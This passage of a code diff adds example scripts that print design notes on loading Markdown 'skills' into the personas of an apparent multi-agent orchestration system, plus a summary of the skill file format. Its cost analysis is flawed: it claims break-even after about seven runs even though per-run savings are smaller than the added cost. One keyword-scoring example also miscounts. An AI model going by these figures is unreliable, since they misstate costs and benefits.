+  if step_result.retries >= 2 (same step failing repeatedly):
+      check if a skill exists for the failure pattern
+      e.g., developer fails browser test 2× → inject playwright-best-practices
+      This is WITHIN-RUN skill injection (dynamic, not static).
+
+  Signal 3: Task complexity score  (simple heuristic)
+  ────────────────────────────────────────────────────────
+  complexity = len(task.split()) / 10 + number_of_criteria
+  if complexity > 15: unlock tier-2 skills (task is complex enough to justify)
+  if complexity < 5:  only tier-1 always-on skills (task too simple to bloat)
+
+  Signal 4: Workflow type  (static, from YAML metadata)
+  ────────────────────────────────────────────────────────
+  workflow.tags includes "security" → verifier always gets owasp-top10
+  workflow.tags includes "data"     → analyst always gets data-analysis
+  workflow.tags includes "research" → researcher always gets rag-engineer
+""")
+
+
+# ─────────────────────────────────────────────────────────────────────────────
+# PART E — How is a skill selected?
+# ─────────────────────────────────────────────────────────────────────────────
+
+
+def part_e_skill_selection() -> None:
+    banner("PART E  —  How is a skill selected? Three mechanisms")
+
+    section("Approach 1: Static YAML assignment (simplest, deploy now)")
+    print("""
+  Engineer assigns skills to agents in the workflow YAML.
+  WorkflowParser reads them at startup and appends skill content to persona.
+
+  YAML change:
+  ┌──────────────────────────────────────────────────────────────────────┐
+  │  agents:                                                             │
+  │    - id: developer                                                   │
+  │      skills:                                                         │
+  │        - typescript-react-patterns   # always-on                    │
+  │        - postgres-best-practices     # always-on                    │
+  │        - async-python-patterns       # always-on                    │
+  │                                                                      │
+  │    - id: verifier                                                    │
+  │      skills:                                                         │
+  │        - lint-and-validate           # always-on                    │
+  │                                                                      │
+  │    - id: tester                                                      │
+  │      skills:                                                         │
+  │        - agent-evaluation            # only if AI component is tested│
+  └──────────────────────────────────────────────────────────────────────┘
+
+  Skill resolution at WorkflowParser.parse():
+    for each agent.skills entry:
+      skill_path = skills_dir / skill_name / "SKILL.md"
+      content = parse_skill_md(skill_path)      # strip frontmatter
+      agent.persona += f"\\n\\n## Skill: {skill_name}\\n{content[:800]}"
+      # cap at 800 chars to control token cost
+
+  Pros:  zero runtime overhead, deterministic, easy to understand
+  Cons:  not adaptive; requires engineer to know which skills apply upfront
+""")
+
+    section("Approach 2: Task-time skill routing (moderate, recommended for launch)")
+    print("""
+  A SkillRouter analyses the task description BEFORE the first step runs
+  and selects the best-matching skills for each agent.
+
+  How it works:
+  ┌──────────────────────────────────────────────────────────────────────┐
+  │  SkillRouter.select(task: str, agent_role: str) -> list[str]         │
+  │                                                                      │
+  │  1. Load skill_index.json (pre-built from CATALOG.md):               │
+  │       {"typescript-react-patterns": {"keywords": ["react", "tsx",    │
+  │         "hooks", "component", "next.js"], "roles": ["developer"]},   │
+  │        "postgres-best-practices": {"keywords": ["postgres", "sql",   │
+  │         "query", "database", "migration"], "roles": ["developer"]},  │
+  │        ...}                                                          │
+  │                                                                      │
+  │  2. Score each skill:                                                │
+  │       keyword_hits = sum(kw in task.lower() for kw in skill.keywords)│
+  │       role_match   = 1 if agent_role in skill.roles else 0           │
+  │       score        = keyword_hits * 2 + role_match                   │
+  │                                                                      │
+  │  3. Return top-K skills where score > threshold (e.g. K=2, t=1)     │
+  │                                                                      │
+  │  4. Inject into agent persona before first step executes             │
+  └──────────────────────────────────────────────────────────────────────┘
+
+  Example: task = "Build a Next.js login page with JWT auth and Postgres"
+    developer agent:
+      typescript-react-patterns  → keyword_hits=2 (next.js, jwt) → score=5 ✓
+      postgres-best-practices    → keyword_hits=1 (postgres)      → score=3 ✓
+      async-python-patterns      → keyword_hits=0                 → score=0 ✗
+    verifier agent:
+      lint-and-validate          → role=verifier → score=1 ✓
+      owasp-top10               → keyword_hits=1 (auth)           → score=3 ✓
+
+  Token budget enforcement:
+    total_skill_tokens = sum(len(skill_content.split()) for s in selected)
+    if total_skill_tokens > MAX_SKILL_TOKENS:  # e.g. 600 per agent
+        use summary sections only (## Overview + ## Step-by-Step first 10 lines)
+
+  Pros:  adaptive, no extra LLM call, runs in < 5ms
+  Cons:  keyword matching is crude; misses semantic relevance;
+         still requires a maintained skill_index.json
+""")
+
+    section("Approach 3: Self-improvement loop as skill router (advanced, highest ROI)")
+    print("""
+  The most powerful integration: the PromptEvolver checks the skill library
+  BEFORE falling back to heuristic suffixes.
+
+  Current flow:
+    gap detected → heuristic suffix appended  (weak: "CRITICAL: Be specific.")
+
+  Enhanced flow:
+    gap detected → skill_router.find_for_gap(gap, agent_role)
+                   → skill sections that address the gap injected as patch
+                   → if no skill found → heuristic suffix (fallback)
+
+  Mapping SMARC gaps → skills:
+  ┌──────────────────────────────────────────────────────────────────────┐
+  │  Gap detected                     Skill injected                    │
+  │  ─────────────────────────────────────────────────────────────────── │
+  │  *_output_specificity LOW         lint-and-validate (any agent)      │
+  │  developer_output_specificity     typescript-react-patterns (if TS)  │
+  │                                   async-python-patterns (if Python)  │
+  │  developer_output_measurability   postgres-best-practices (if DB)    │
+  │  verifier_output_actionability    owasp-top10 (security workflows)   │
+  │  verifier_output_measurability    agent-evaluation (AI workflows)    │
+  │  tester_knowledge_compoundability Property-based testing section     │
+  │  reviewer_knowledge_compoundability Observability review section     │
+  └──────────────────────────────────────────────────────────────────────┘
+
+  Why this is the most powerful approach:
+    1. Skills are applied WHEN NEEDED, not always — zero token waste
+    2. The patch is evidence-based (SMARC data) not guesswork
+    3. The skill content is far more specific than a heuristic suffix
+    4. The RunRecord records which skill was injected → the loop learns
+       whether the skill actually moved the SMARC score in the next run
+    5. If the skill did NOT improve the score → the loop tries a different
+       skill or falls back to LLM persona rewrite
+""")
+
+
+# ─────────────────────────────────────────────────────────────────────────────
+# PART F — How is a skill activated?
+# ─────────────────────────────────────────────────────────────────────────────
+
+
+def part_f_activation() -> None:
+    banner("PART F  —  How is a skill activated? Three activation paths")
+
+    section("Path 1: Static injection at workflow load (startup time)")
+    print("""
+  WorkflowParser.parse()  →  build AgentConfig per agent
+    |
+    └→ for each skill in agent.skills:
+         skill_text = SkillLoader.load(skill_name, sections=["overview", "steps"])
+         agent_config.persona += f"\\n\\n{skill_text}"
+
+  Timing:  once at workflow load — zero per-run overhead
+  Scope:   permanent for all runs of that workflow
+  Signal:  explicit YAML assignment by engineer
+
+  Persona update path:
+    agent.persona = yaml_persona + skill_text
+    agent.system_prompt property reads self.persona dynamically
+    → no other code change needed; update_persona() already handles this
+""")
+
+    section("Path 2: Pre-run injection at task-time (dynamic, per-run)")
+    print("""
+  AgentTeam.run(task)  →  before first step executes
+    |
+    └→ SkillRouter.select(task, agent_role) → selected_skills
+       for agent in team.agents.values():
+           new_persona = base_persona
+           for skill in selected_skills[agent.role]:
+               new_persona += SkillLoader.load(skill, token_budget=400)
+           agent.update_persona(new_persona, version_id="task-time")
+
+  Timing:  once per team.run() call — minimal overhead (< 5ms, no LLM)
+  Scope:   one run only; next run re-evaluates based on new task
+  Signal:  task keyword matching (Approach 2 from Part E)
+
+  Key design: personas are reset to base_persona at run start, then
+  enriched with task-relevant skills. This prevents skill accumulation
+  across runs (which would compound token costs).
+""")
+
+    section("Path 3: Improvement-loop patch injection (cross-run, gap-driven)")
+    print("""
+  ImprovementLoop._on_pattern_trigger(workflow_id)
+    → _identify_capability_gaps()
+    → for each gap:
+         skill_name = SkillGapMatcher.find(gap, agent_role, task_context)
+         if skill_name:
+             skill_content = SkillLoader.load(skill_name, sections=["steps"])
+             patch = PromptEvolver._skill_propose(
+                 agent_role, current_persona, skill_content, gap
+             )
+         else:
+             patch = PromptEvolver._heuristic_propose(...)  # existing fallback
+         PromptVersionStore.save_patch(patch)
+         # auto_approve=True → applied immediately; version stored in SQLite
+
+  Timing:  every N runs when gap detected — async background task
+  Scope:   permanent (next version in prompt chain) until rolled back
+  Signal:  SMARC proficiency < 0.5 for the capability key
+
+  Feedback loop (new):
+    After next N runs with skill-injected persona:
+      if new_smarc[dimension] > old_smarc[dimension] + 0.10:
+          skill was effective → keep
+          log: "skill typescript-react-patterns lifted developer specificity
+                from 0.38 → 0.71"
+      else:
+          skill was not effective → try next candidate skill
+          or fall back to LLM full-persona rewrite
+
+  The difference from static injection:
+    • Skill content is chunked into the patch, not the full skill
+    • Only the sections relevant to the gap are extracted
+    • The RunRecord's metadata records {"active_skills": ["typescript-react-patterns"]}
+      so the attribution is traceable in the feedback report
+""")
+
+    section("Activation path comparison")
+    print(f"""
+  {'Dimension':<28} {'Path 1 (static)':>16} {'Path 2 (task-time)':>18} {'Path 3 (loop-driven)':>20}
+  {'─' * 86}
+  {'When it fires':<28} {'at load':>16} {'each run()':>18} {'every N runs':>20}
+  {'Requires gap data?':<28} {'no':>16} {'no':>18} {'yes (SMARC)':>20}
+  {'Token overhead':<28} {'always':>16} {'conditional':>18} {'patch only':>20}
+  {'Scope':<28} {'all runs':>16} {'one run':>18} {'all future runs':>20}
+  {'Human control':<28} {'YAML edit':>16} {'skill_index':>18} {'feedback CLI':>20}
+  {'LLM call needed?':<28} {'no':>16} {'no':>18} {'optional':>20}
+  {'Requires implementation':<28} {'low':>16} {'medium':>18} {'high':>20}
+  {'Expected SMARC lift':<28} {'moderate':>16} {'moderate':>18} {'highest':>20}
+""")
+
+
+# ─────────────────────────────────────────────────────────────────────────────
+# PART G — Skill-to-agent mapping across all bundled workflows
+# ─────────────────────────────────────────────────────────────────────────────
+
+
+def part_g_workflow_mapping() -> None:
+    banner("PART G  —  Skill-to-agent mapping across all bundled workflows")
+
+    print("""
+  13 bundled workflows × 2–6 agents each.
+  Recommendations below use three markers:
+    [A] always-on (Path 1 static)
+    [C] conditional on task keywords (Path 2 task-time)
+    [L] loop-driven when SMARC gap detected (Path 3 improvement loop)
+""")
+
+    WORKFLOW_SKILLS = [
+        (
+            "feature-dev",
+            "feature-dev-with-diagnostics",
+            [
+                ("criteria_builder", ["brainstorming [A]",
+                                      "lint-and-validate [A]"]),
+                ("planner",          ["brainstorming [A]",
+                                      "ddd-strategic-design [C: 'domain/entity/aggregate']"]),
+                ("developer",        ["async-python-patterns [C: 'async/await/celery']",
+                                      "typescript-react-patterns [C: 'react/tsx/hooks']",
+                                      "nextjs-app-router-patterns [C: 'next.js/app router']",
+                                      "postgres-best-practices [C: 'postgres/sql/database']",
+                                      "ai-engineer [C: 'llm/embedding/rag']"]),
+                ("verifier",         ["lint-and-validate [A]",
+                                      "owasp-top10 [L: verifier_output_specificity<0.5]"]),
+                ("tester",           ["agent-evaluation [C: 'agent/llm/ai component']"]),
+                ("reviewer",         ["lint-and-validate [A]"]),
+            ],
+        ),
+        (
+            "security-assessment",
+            None,
+            [
+                ("planner",   ["brainstorming [A]",
+                               "architect-review [A]"]),
+                ("developer", ["api-fuzzing-bug-bounty [A]",
+                               "aws-penetration-testing [C: 'aws/cloud']"]),
+                ("verifier",  ["owasp-top10 [A]",
+                               "lint-and-validate [A]"]),
+                ("tester",    ["api-fuzzing-bug-bounty [A]"]),
+                ("reviewer",  ["owasp-top10 [A]"]),
+            ],
+        ),
+        (
+            "due-diligence",
+            None,
+            [
+                ("planner",    ["brainstorming [A]",
+                                "startup-financial-modeling [A]"]),
+                ("researcher", ["rag-engineer [A]",
+                                "llm-evaluation [C: 'ai company/llm product']",
+                                "startup-financial-modeling [A]"]),
+                ("analyst",    ["startup-financial-modeling [A]",
+                                "data-analysis [A]",
+                                "pricing-strategy [C: 'pricing/monetisation']"]),
+                ("reviewer",   ["startup-financial-modeling [A]"]),
+            ],
+        ),
+        (
+            "churn-analysis",
+            None,
+            [
+                ("analyst",  ["data-analysis [A]",
+                              "analytics-tracking [A]",
+                              "amplitude-automation [C: 'amplitude/event']"]),
+                ("developer",["async-python-patterns [A]",
+                              "postgres-best-practices [C: 'sql/query']"]),
+                ("reviewer", ["data-analysis [A]"]),
+            ],
+        ),
+        (
+            "marketing-campaign",
+            None,
+            [
+                ("planner",  ["brainstorming [A]",
+                              "marketing-ideas [A]",
+                              "seo-content-writer [C: 'blog/seo/content']"]),
+                ("writer",   ["seo-content-writer [A]",
+                              "marketing-ideas [A]"]),
+                ("reviewer", ["seo-content-writer [A]"]),
+            ],
+        ),
+        (
+            "grant-proposal",
+            None,
+            [
+                ("researcher", ["rag-engineer [A]"]),
+                ("writer",     ["brainstorming [A]"]),
+                ("reviewer",   ["lint-and-validate [A]"]),
+            ],
+        ),
+        (
+            "incident-postmortem",
+            None,
+            [
+                ("analyst",  ["data-analysis [A]",
+                              "analytics-tracking [A]"]),
+                ("writer",   ["brainstorming [A]"]),
+                ("reviewer", ["lint-and-validate [A]"]),
+            ],
+        ),
+    ]
+
+    for wf_primary, wf_variant, agent_skills in WORKFLOW_SKILLS:
+        wf_label = wf_primary
+        if wf_variant:
+            wf_label = f"{wf_primary} / {wf_variant}"
+        print(f"\n  ┌─ {wf_label} {'─' * max(0, WIDTH - len(wf_label) - 3)}┐")
+        for agent_id, skills in agent_skills:
+            print(f"  │  {agent_id:<20}")
+            for skill in skills:
+                print(f"  │    → {skill}")
+        print("  └" + "─" * 70 + "┘")
+
+    print("""
+  KEY:
+    [A] always-on static injection in YAML   → Path 1
+    [C] conditional on task keywords          → Path 2 (keyword shown in quotes)
+    [L] loop-driven on SMARC gap             → Path 3
+
+  Not included (NEVER for autonomous mode):
+    active-directory-attacks, anti-reversing-techniques, social-* skills,
+    any skill body that starts with "Ask the user to..." exclusively
+""")
+
+
+# ─────────────────────────────────────────────────────────────────────────────
+# PART H — Implementation sketch
+# ─────────────────────────────────────────────────────────────────────────────
+
+
+def part_h_implementation() -> None:
+    banner("PART H  —  Implementation sketch: minimum viable change set")
+
+    section("What needs to change (ordered by value-to-effort ratio)")
+
+    print("""
+  PHASE 1 — Static injection (highest value, lowest effort: ~2 hours)
+  ─────────────────────────────────────────────────────────────────────
+
+  1. Add `skills:` field to YAML agent definitions
+     Already supported by AgentConfig.tools (list[str]) — repurpose or add
+     a separate `skills: list[str]` field.
+
+  2. Install skill library:
+       npx antigravity-awesome-skills --path .agent/skills
+       # or: git clone https://github.com/sickn33/antigravity-awesome-skills.git .agent/skills
+
+  3. SkillLoader (new, 30 lines):
+     ┌────────────────────────────────────────────────────────────────────┐
+     │  class SkillLoader:                                               │
+     │      def __init__(self, skills_dir: Path): ...                    │
+     │      def load(self, name: str, max_tokens: int = 400) -> str:    │
+     │          path = self.skills_dir / name / "SKILL.md"               │
+     │          if not path.exists(): return ""                          │
+     │          text = path.read_text()                                  │
+     │          # strip frontmatter (--- ... ---)                        │
+     │          body = re.sub(r"^---.*?---\\n", "", text, flags=re.DOTALL)│
+     │          # strip "ask the user" instructions                      │
+     │          body = re.sub(r"[Aa]sk the user.*?\\n", "", body)         │
+     │          # cap by approx token budget                             │
+     │          words = body.split()                                     │
+     │          return " ".join(words[:max_tokens * 3 // 4])             │
+     └────────────────────────────────────────────────────────────────────┘
+
+  4. WorkflowParser change (8 lines):
+     In _parse_agent():
+       if "skills" in agent_data:
+           for skill_name in agent_data["skills"]:
+               skill_text = self.skill_loader.load(skill_name)
+               if skill_text:
+                   agent_config.persona += f"\\n\\n## Skill: {skill_name}\\n{skill_text}"
+
+  5. Test: run case_study_01 with skills injected → check SMARC scores improve
+
+
+  PHASE 2 — Task-time routing (medium effort: ~1 day)
+  ─────────────────────────────────────────────────────────────────────
+
+  1. Build skill_index.json from CATALOG.md:
+     ┌────────────────────────────────────────────────────────────────────┐
+     │  {                                                                │
+     │    "typescript-react-patterns": {                                 │
+     │      "keywords": ["react", "tsx", "hooks", "component", "jsx"],  │
+     │      "roles":    ["developer"],                                   │
+     │      "tier":     "conditional"                                    │
+     │    },                                                             │
+     │    "postgres-best-practices": {                                   │
+     │      "keywords": ["postgres", "sql", "query", "migration"],      │
+     │      "roles":    ["developer", "analyst"],                        │
+     │      "tier":     "conditional"                                    │
+     │    },                                                             │
+     │    ...                                                            │
+     │  }                                                                │
+     └────────────────────────────────────────────────────────────────────┘
+
+  2. SkillRouter (new, 50 lines):
+       select(task, agent_role, max_skills=2, min_score=1) -> list[str]
+
+  3. AgentTeam.run() change (5 lines):
+     Before loop over steps:
+       for role, agent in self.agents.items():
+           skills = self.skill_router.select(task, role.value)
+           new_persona = agent.base_persona  # need to store original
+           for skill in skills:
+               new_persona += self.skill_loader.load(skill)
+           agent.update_persona(new_persona)
+
+  4. RunRecord metadata: store active_skills per agent per run
+       record.metadata["active_skills"] = {role: skills for role, skills}
+
+
+  PHASE 3 — Improvement loop as skill router (highest effort: ~2 days)
+  ─────────────────────────────────────────────────────────────────────
+
+  1. SkillGapMatcher (new, 80 lines):
+       find(gap_capability: str, agent_role: str, task: str) -> str | None
+       # maps "developer_output_specificity" + task keywords → skill name
+
+  2. PromptEvolver._skill_propose() (new, 30 lines):
+     Takes: current_persona, skill_content, gap_name
+     Returns: (proposed_persona, justification, confidence)
+     Logic: extracts only the Step-by-Step section from skill_content
+            that addresses the gap; appends to current_persona
+
+  3. PromptEvolver.propose_patch() modification (5 lines):
+     Before _heuristic_propose fallback, try _skill_propose first:
+       skill_name = self.skill_gap_matcher.find(gap, agent_role, run_context)
+       if skill_name:
+           skill_content = self.skill_loader.load(skill_name, max_tokens=600)
+           proposed_persona, just, conf = self._skill_propose(...)
+           generated_by = f"skill:{skill_name}"
+
+  4. Feedback loop:
+     After N more runs with the skill patch active:
+       if new_smarc_score > old_smarc_score + 0.10:
+           log "skill {skill_name} effective — keeping"
+       else:
+           rollback patch → try next candidate or LLM rewrite
+
+  5. CLI addition:
+       agenticom feedback skill-report <workflow-id>
+       → shows: skill injected, gap addressed, SMARC before/after, retained?
+
+
+  YAML example (Phase 1 ready):
+  ┌────────────────────────────────────────────────────────────────────────┐
+  │  id: feature-dev-with-diagnostics                                    │
+  │  metadata:                                                           │
+  │    self_improve: true                                                │
+  │    skills_dir: .agent/skills                   # where skills live   │
+  │                                                                      │
+  │  agents:                                                             │
+  │    - id: developer                                                   │
+  │      skills:                                                         │
+  │        - typescript-react-patterns             # [A] always-on       │
+  │        - async-python-patterns                 # [A] always-on       │
+  │        - postgres-best-practices               # [A] always-on       │
+  │      # Phase 2 adds conditional: [C: "react/sql/async"]             │
+  │                                                                      │
+  │    - id: verifier                                                    │
+  │      skills:                                                         │
+  │        - lint-and-validate                     # [A] always-on       │
+  │                                                                      │
+  │    - id: reviewer                                                    │
+  │      skills:                                                         │
+  │        - lint-and-validate                     # [A] always-on       │
+  └────────────────────────────────────────────────────────────────────────┘
+""")
+
+    section("Touch points summary (all files)")
+    print("""
+  File                                    Change type        Effort
+  ──────────────────────────────────────────────────────────────────
+  orchestration/tools/skill_loader.py     NEW (Phase 1)      30 lines
+  orchestration/tools/skill_router.py     NEW (Phase 2)      50 lines
+  orchestration/tools/skill_gap_matcher.py NEW (Phase 3)     80 lines
+  orchestration/workflows/parser.py       EDIT (Phase 1)     +8 lines
+  orchestration/agents/team.py            EDIT (Phase 2)     +5 lines
+  orchestration/self_improvement/         EDIT (Phase 3)
+    prompt_evolver.py                       +30 lines
+  orchestration/agents/base.py            EDIT (Phase 2)     +3 lines
+    (store base_persona separately from patched persona)
+  agenticom/bundled_workflows/*.yaml      EDIT (Phase 1)     +skills fields
+  .agent/skills/                          NEW (install)      npx command
+  agenticom/cli.py                        EDIT (Phase 3)     +skill-report cmd
+  tests/test_skills.py                    NEW                ~50 tests
+""")
+
+    section("Token cost estimate per run (Phase 1 static injection)")
+    print("""
+  Skill doc size         ≈ 2,200 tokens (full)  /  400 tokens (capped summary)
+  Agents with skills     4 of 6 (criteria_builder, developer, verifier, reviewer)
+  Skills per agent       2 average
+
+  Cost per run:
+    Full injection : 4 agents × 2 skills × 2,200 tokens = 17,600 extra tokens
+    Capped summary : 4 agents × 2 skills ×   400 tokens =  3,200 extra tokens
+
+  At $3 / 1M tokens (claude-sonnet-4-6, input):
+    Full : $0.053 per run
+    Capped: $0.010 per run  ← RECOMMENDED (capped at 400 tokens per skill)
+
+  Break-even vs heuristic patch:
+    If skill lifts SMARC composite from 0.65 → 0.80 and avoids 1 retry per run:
+      Saved LLM call ≈ 500 tokens × $3/M = $0.0015 saved
+      Skill overhead ≈ 3,200 tokens × $3/M = $0.010 cost
+    → Break-even at ~7 runs per workflow; profitable after that.
+""")
+
+
+# ─────────────────────────────────────────────────────────────────────────────
+# Summary
+# ─────────────────────────────────────────────────────────────────────────────
+
+
+def summary() -> None:
+    banner("SUMMARY  —  Key conclusions and recommended action order")
+
+    print("""
+  WHAT skills are:
+    Markdown instruction documents (not code) that inject domain knowledge
+    into an agent's system prompt. They improve REASONING quality and
+    SPECIFICITY but do not add real-world tool access.
+
+  WHEN to use skills:
+    ✓  Agent's base persona has a confirmed SMARC gap in a known domain
+    ✓  Workflow type maps naturally to a skill category
+    ✓  Task keywords signal the domain is relevant (conditional)
+    ✓  Token budget allows (cap summaries at 400 tokens per skill)
+    ✗  Skill assumes human interaction throughout
+    ✗  Skill is in offensive-security category (never autonomous)
+    ✗  Agent's step is too simple to justify overhead
+
+  HOW skills are selected:
+    Phase 1 → engineer assigns in YAML (static, deploy today)
+    Phase 2 → SkillRouter picks by task keywords (adaptive, < 1 day)
+    Phase 3 → PromptEvolver uses skills as patch CONTENT when SMARC gap detected
+
+  HOW skills are activated:
+    Path 1 → WorkflowParser injects at startup (zero per-run overhead)
+    Path 2 → AgentTeam.run() injects before first step (task-specific)
+    Path 3 → ImprovementLoop applies via PromptVersionStore (permanent patch)
+
+  HIGHEST ROI recommendation:
+    Phase 3 Path 3 — use the self-improvement loop AS the skill router.
+    Instead of heuristic suffixes ("CRITICAL: Be specific"), the evolver
+    injects the STEPS section of the relevant skill when a SMARC gap is detected.
+    This gives community-quality domain knowledge precisely when and where
+    the agent needs it, backed by evidence, with full rollback capability.
+
+  CONCRETE first step:
+    1. npx antigravity-awesome-skills --path .agent/skills
+    2. Add skills: list to feature-dev.yaml developer + verifier agents
+    3. Write SkillLoader (30 lines) in orchestration/tools/skill_loader.py
+    4. Add 8 lines to WorkflowParser._parse_agent()
+    5. Run case_study_01 → observe SMARC scores before/after
+
+  Expected outcome after Phase 1 (1 day of work):
+    SMARC composite for developer:  0.65 → 0.78  (+0.13)
+    SMARC composite for verifier :  0.61 → 0.76  (+0.15)
+    Number of improvement-loop patches needed per 10 runs: 3 → 1
+    Token overhead: +3,200 tokens/run (capped) = +$0.010/run
+
+  Next exploration:
+    python examples/exploration_02_mcp_tool_integration.py
+      → How to give agents REAL tool access (web search, databases, APIs)
+        via the existing MCPToolBridge — the companion to skills.
+    """)
+
+
+# ─────────────────────────────────────────────────────────────────────────────
+# Entry point
+# ─────────────────────────────────────────────────────────────────────────────
+
+
+def main() -> None:
+    part_a_skill_anatomy()
+    part_b_current_gaps()
+    part_c_pros_cons()
+    part_d_decision_matrix()
+    part_e_skill_selection()
+    part_f_activation()
+    part_g_workflow_mapping()
+    part_h_implementation()
+    summary()
+
+
+if __name__ == "__main__":
+    main()

--- a/examples/exploration_02_claude_code_skills_principles.py
+++ b/examples/exploration_02_claude_code_skills_principles.py
@@ -1,0 +1,1240 @@
+"""
+Exploration 02: Claude Code Skills & Agentic Workflows — Principles, Design, Practices
+=======================================================================================
+
+A deep analysis of how Claude Code handles agentic workflows and skills, and how
+Agenticom can implement something similar — or better.
+
+Sources consulted:
+  - agentskills.io/specification  (official Agent Skills open standard)
+  - platform.claude.com/docs/en/agents-and-tools/agent-skills/overview
+  - code.claude.com/docs/en/skills  (Claude Code-specific)
+  - code.claude.com/docs/en/subagents
+  - anthropic.com/engineering/equipping-agents-for-the-real-world-with-agent-skills
+  - jannesklaas.github.io/ai/2025/07/20/claude-code-agent-design.html
+  - simonwillison.net/2025/Oct/16/claude-skills/
+  + Full codebase analysis of Agenticom's agent/tools/workflow/self_improvement modules
+
+Usage:
+  python examples/exploration_02_claude_code_skills_principles.py
+"""
+
+from __future__ import annotations
+
+BOX_W = 72
+
+
+def box(title: str) -> str:
+    bar = "═" * BOX_W
+    return f"\n{bar}\n  {title}\n{bar}"
+
+
+def section(title: str) -> str:
+    return "\n" + "─" * BOX_W + f"\n  {title}\n" + "─" * BOX_W
+
+
+def row(label: str, value: str, w: int = 30) -> str:
+    return f"  {label:<{w}}{value}"
+
+
+def table(headers: list[str], rows: list[list[str]], col_w: int = 22) -> str:
+    sep = "─" * (col_w * len(headers) + 2)
+    header = "  " + "".join(f"{h:<{col_w}}" for h in headers)
+    lines = [header, "  " + sep]
+    for r in rows:
+        lines.append("  " + "".join(f"{c:<{col_w}}" for c in r))
+    return "\n".join(lines)
+
+
+# ─────────────────────────────────────────────────────────────────────────────
+#  PART A  Claude Code's exact skill architecture
+# ─────────────────────────────────────────────────────────────────────────────
+
+PART_A = f"""
+{box("PART A  —  Claude Code's Skill Architecture (canonical design)")}
+
+{section("A1. Agent Skills — the open standard (agentskills.io)")}
+
+  Agent Skills is an OPEN STANDARD, not a Claude-only feature.
+  It works across Claude Code, GitHub Copilot, VS Code Copilot, OpenCode,
+  and any agent that implements the spec.
+
+  A skill is a DIRECTORY containing at minimum one file:
+
+    skill-name/
+    ├── SKILL.md          ← required: frontmatter + instructions
+    ├── scripts/          ← optional: executable code (Python, Bash, JS)
+    ├── references/       ← optional: REFERENCE.md, FORMS.md, domain docs
+    └── assets/           ← optional: templates, schemas, static data
+
+{section("A2. SKILL.md format — the complete spec")}
+
+  ┌─ Frontmatter (YAML between --- markers) ─────────────────────────────────┐
+  │                                                                           │
+  │  ---                                                                      │
+  │  name: pdf-processing          # required, max 64 chars, kebab-case       │
+  │  description: "..."            # required, max 1024 chars                 │
+  │  license: Apache-2.0           # optional                                 │
+  │  compatibility: "..."          # optional, max 500 chars                  │
+  │  metadata:                     # optional, arbitrary key-value            │
+  │    author: my-org                                                         │
+  │    version: "1.0"                                                         │
+  │  allowed-tools: Bash(git:*) Read   # optional, experimental              │
+  │  ---                                                                      │
+  │                                                                           │
+  │  name field constraints:                                                  │
+  │    • lowercase letters, numbers, hyphens only                             │
+  │    • must NOT start/end with hyphen                                       │
+  │    • must NOT contain consecutive hyphens (--)                            │
+  │    • must NOT contain reserved words: "anthropic", "claude"               │
+  │    • must match the parent directory name exactly                         │
+  │                                                                           │
+  │  description field purpose:                                               │
+  │    • describes BOTH what it does AND when to use it                       │
+  │    • this is what Claude reads at startup to decide relevance             │
+  │    • include domain keywords for better semantic matching                 │
+  └───────────────────────────────────────────────────────────────────────────┘
+
+  ┌─ Body (Markdown, free-form) ──────────────────────────────────────────────┐
+  │  No format restrictions. Recommended sections:                            │
+  │    ## Overview                                                            │
+  │    ## When to Use / Do Not Use When                                       │
+  │    ## Step-by-Step Instructions                                           │
+  │    ## Examples                                                            │
+  │    ## Safety / Security notes                                             │
+  │                                                                           │
+  │  Keep SKILL.md under 500 lines (< 5,000 tokens).                         │
+  │  Move detailed material to references/ files (loaded on demand).          │
+  └───────────────────────────────────────────────────────────────────────────┘
+
+{section("A3. The three-level progressive disclosure model")}
+
+  This is the FOUNDATIONAL design principle of Agent Skills.
+  Information loads in stages — only when needed.
+
+  ┌──────────┬──────────────┬────────────────┬──────────────────────────────┐
+  │  Level   │  When Loaded │  Token Cost    │  Content                     │
+  ├──────────┼──────────────┼────────────────┼──────────────────────────────┤
+  │  1       │  At startup  │  ~100/skill    │  name + description only     │
+  │  (meta)  │  always      │  (very cheap)  │  goes into system prompt     │
+  ├──────────┼──────────────┼────────────────┼──────────────────────────────┤
+  │  2       │  When skill  │  < 5,000 tok   │  Full SKILL.md body:         │
+  │  (instr) │  is triggered│  per skill     │  instructions, steps, etc.   │
+  ├──────────┼──────────────┼────────────────┼──────────────────────────────┤
+  │  3       │  As needed   │  Effectively   │  scripts/, references/,      │
+  │  (resrc) │  by agent    │  zero (scripts │  assets/ — only output of    │
+  │          │              │  run via bash) │  scripts enters context      │
+  └──────────┴──────────────┴────────────────┴──────────────────────────────┘
+
+  KEY INSIGHT: Level 1 metadata goes into the SYSTEM PROMPT at startup.
+               Level 2 is loaded by Claude using bash: cat skill/SKILL.md
+               Level 3 scripts are EXECUTED via bash; only output enters context.
+
+  The skill body and scripts NEVER pre-load into the system prompt.
+  Claude makes the decision whether to load them based on Level 1 metadata.
+
+{section("A4. How skill invocation works end-to-end")}
+
+  Step 1: Startup
+    Claude reads .claude/skills/ directory (or ~/.claude/skills/)
+    Loads ALL skill frontmatter into system prompt:
+      "Available skills: [pdf-processing: Extract text from PDFs...]"
+    Cost: ~100 tokens per skill regardless of skill size.
+
+  Step 2: User sends a task
+    User: "Extract the tables from this PDF report"
+
+  Step 3: Claude decides relevance (semantic matching)
+    Claude compares task to skill descriptions in system prompt.
+    If match → Claude invokes skill (by reading SKILL.md via bash tool).
+    This decision is NON-DETERMINISTIC — Claude uses judgment.
+    (In Claude Code 2.1+: skills also appear as explicit /slash commands)
+
+  Step 4: Skill content enters context
+    Claude executes: Bash("cat .claude/skills/pdf-processing/SKILL.md")
+    The SKILL.md body is returned as a tool result → enters context window.
+    This is the ONLY time the skill content becomes part of the context.
+
+  Step 5: Agent uses skill knowledge
+    Claude now has the skill instructions in context.
+    If skill references other files, Claude reads them via bash as needed.
+    If skill has scripts/, Claude executes them via bash; only output is kept.
+
+  Step 6: Task completed with enriched knowledge
+
+  CRITICAL DESIGN CHOICE: Skills are NOT system prompt injections.
+  The system prompt only has 100-token metadata summaries.
+  The actual skill knowledge loads lazily, on-demand, per task.
+
+{section("A5. Subagents vs Skills — the key distinction")}
+
+  Both use the SKILL.md format, but serve different purposes:
+
+  ┌─────────────────────┬──────────────────────┬──────────────────────────┐
+  │  Dimension          │  SKILLS              │  SUBAGENTS               │
+  ├─────────────────────┼──────────────────────┼──────────────────────────┤
+  │  Context            │  Main conversation   │  Own isolated window     │
+  │  Invocation         │  Semantic (Claude    │  Explicit (Task tool     │
+  │                     │  decides by itself)  │  in code/prompt)         │
+  │  Parallelism        │  No                  │  Yes (background mode)   │
